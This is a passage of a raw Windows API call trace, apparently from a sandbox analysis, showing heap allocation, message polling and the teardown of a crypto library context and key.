(HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0162.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0162.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0162.071] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.071] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0162.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0162.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0162.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0162.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0162.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0162.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0162.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0162.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0162.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0162.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0162.071] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0162.071] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0162.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0162.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0162.072] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0162.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0162.072] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0162.072] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0162.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0162.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0162.072] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0162.072] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0162.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0162.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0162.072] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0162.072] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0162.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0162.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0162.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0162.072] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0162.072] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0162.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0162.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0162.072] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0162.072] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0162.072] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0162.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0162.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0162.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0162.076] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0162.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0162.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0162.076] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.076] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0162.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0162.076] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0162.081] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0162.081] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0162.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0162.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0162.082] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0162.082] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0162.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0162.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0162.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0162.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0162.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0162.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0162.082] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.082] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0162.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0162.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0162.082] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0162.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0162.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0162.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0162.082] CryptDestroyKey (hKey=0x90af18) returned 1 [0162.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0162.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0162.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0162.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0162.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0162.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0162.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0162.083] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0162.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0162.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0162.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0162.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0162.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0162.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0162.084] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0162.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0162.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0162.084] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0162.084] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0162.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0162.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0162.084] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0162.084] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0162.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0162.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0162.084] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0162.084] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0162.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0162.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0162.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0162.085] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0162.085] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0162.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0162.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0162.085] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0162.085] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0162.085] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0162.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0162.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0162.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0162.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0162.085] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0162.085] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.085] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0162.085] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.085] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0162.085] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0162.086] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0162.086] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.086] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0162.086] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0162.086] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.086] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.086] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0162.086] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0162.086] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0162.086] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.086] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0162.086] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.086] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.086] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0162.086] FreeLibrary (hLibModule=0x74f20000) returned 1 [0162.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0162.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0162.086] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0162.086] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0162.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0162.087] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0162.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0162.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0162.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0162.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0162.087] CloseHandle (hObject=0x138) returned 1 [0162.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0162.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0162.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0162.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0162.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0162.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0162.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0162.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0162.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0162.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0162.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0162.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0162.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0162.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0162.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0162.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0162.087] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0162.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0162.087] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0162.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0162.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0162.088] CloseHandle (hObject=0x120) returned 1 [0162.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0162.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0162.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0162.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0162.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0162.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0162.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0162.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0162.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0162.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0162.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0162.089] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0162.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0162.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0162.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0162.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0162.090] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0162.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0162.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0162.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0162.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0162.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0162.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0162.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0162.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0162.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0162.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0162.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0162.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0162.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9e5190 | out: hHeap=0x8a0000) returned 1 [0162.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0162.091] HeapFree (in: hHeap=0x8a0000, 